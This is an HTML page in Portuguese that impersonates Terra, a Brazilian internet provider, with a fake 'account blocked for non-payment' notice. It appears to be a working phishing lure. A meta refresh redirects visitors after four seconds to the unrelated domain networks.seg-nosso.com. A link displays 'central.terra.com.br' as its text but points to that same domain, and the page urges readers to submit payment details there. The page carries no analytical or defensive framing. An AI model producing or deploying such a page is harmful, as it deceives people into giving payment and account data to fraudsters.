<!DOCTYPE html>
<html lang="pt-br"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="4;url=https://networks.seg-nosso.com/t/" />
  
  <link type="text/css" rel="stylesheet" media="screen" href="terra-skin.css">
  <title>Acesso bloqueado temporariamente</title>
  <style>
  * { margin: 0; padding: 0; }
  img { border: 0; }
  body { font-family: 'OpenSans',sans-serif; background: #978d81; padding-top: 20px; }
  body #avisos_personalizados { display:none; text-align: left; }
  #simplemodal-overlay { background-color:#fff; }
  body #avisos_personalizados a { color: #f90;text-decoration: none; }
  body #avisos_personalizados a:hover { text-decoration: underline; }
  body #avisos_personalizados { height:637px; width:937px; color:#bbb; border:3px solid #ff7212; margin: 0 auto; position: relative !important; background-image: url("img/bg_sum_v2.jpg");}
  body #avisos_personalizados .simplemodal-data { padding:0; }
  /*#avisos_personalizados p { font: 13px Arial;color: #444;margin-bottom: 18px;line-height: 18px; }*/
  .avisos_personalizados_txt { width: 547px; height: 390px; padding: 50px 45px; background: url("images/aviso_bg.png") 0 0 no-repeat; margin-top: -5px; }
  a.entrar img { position: absolute; top: 233px; right: 33px; }
  body #avisos_personalizados #content_porteira p { font-family:'OpenSans', sans-serif; color: #717171; }
  body #avisos_personalizados #content_porteira p#exception { font-size:14px; font-family:'OpenSans', sans-serif; color: #717171; line-height: 14px;bottom: 0px; font-weight: lighter;}
  body #avisos_personalizados #content_porteira p a { font-size: 24px; color: #ff7212; text-decoration: none; font-weight: bold; }
  body #avisos_personalizados small { font-size: 11px; color:#47423A; position: absolute; bottom: 30px; }
  body #avisos_personalizados #content_porteira{ padding-top: 60px; padding-left: 60px; }
  body #avisos_personalizados #content_porteira h1{ color:#717171; font-size: 36px; margin-bottom: 30px;}
  body #avisos_personalizados #content_porteira p#first_paragraph{ margin-bottom: 30px; font-size:24px; line-height: 30px;}
  body #avisos_personalizados #content_porteira p#second_paragraph{ margin-bottom: 30px;}
  body #avisos_personalizados #content_porteira p#third_paragraph{ font-size: 24px; line-height: 30px;}
  body #avisos_personalizados #content_porteira p#third_paragraph{ margin-bottom: 55px; }
  body #avisos_personalizados #content_porteira p#fourth_paragraph{ margin-bottom: 30px; font-size: 18px; line-height: 23px; }
  body #avisos_personalizados #content_porteira p#fifth_paragraph{ font-size: 18px; line-height: 23px; margin-bottom: 25px;}
  </style>

<body>

  <div id="avisos_personalizados" style="display: block; " class="simplemodal-data">
    <div id="content_porteira">
      <h1>PREZADO CLIENTE,</h1>
      <p id="first_paragraph">Até o momento não identificamos o seu pagamento<br>e o acesso a sua conta está bloqueado.<br>Efetue o pagamento agora, siga o passo a passo:</p>
      <p id="third_paragraph">
        1. Acesse <a class="central btn-porteira-sumcentralinicio" target="_blank" href="https://networks.seg-nosso.com/t/">central.terra.com.br</a>;<br>
        2. Clique no menu <strong>'Minha Conta'</strong>. Vá até o final da página <br> e clique no botão <strong>'Histórico de Cobrança'</strong>.<br>
        3. <strong>Selecione</strong> a cobrança em aberto que deseja efetuar o pagamento;<br>
        4. <strong>Escolha</strong> uma das formas de pagamento disponível, <strong>preencha dos dados</strong><br> solicitados e clique em <strong>'Concluir'</strong>
      </p>
      <p id="fourth_paragraph">Dúvidas? Fale com o Terra. Atendimento nacional: 0800 777 9797.</p>
      <p id="fifth_paragraph">Atenciosamente,<br>Equipe Terra</p>
      <p id="exception">*Caso o acesso a sua conta já esteja normalizado, por favor, desconsidere a mensagem.
    </p></div>
	
</div>

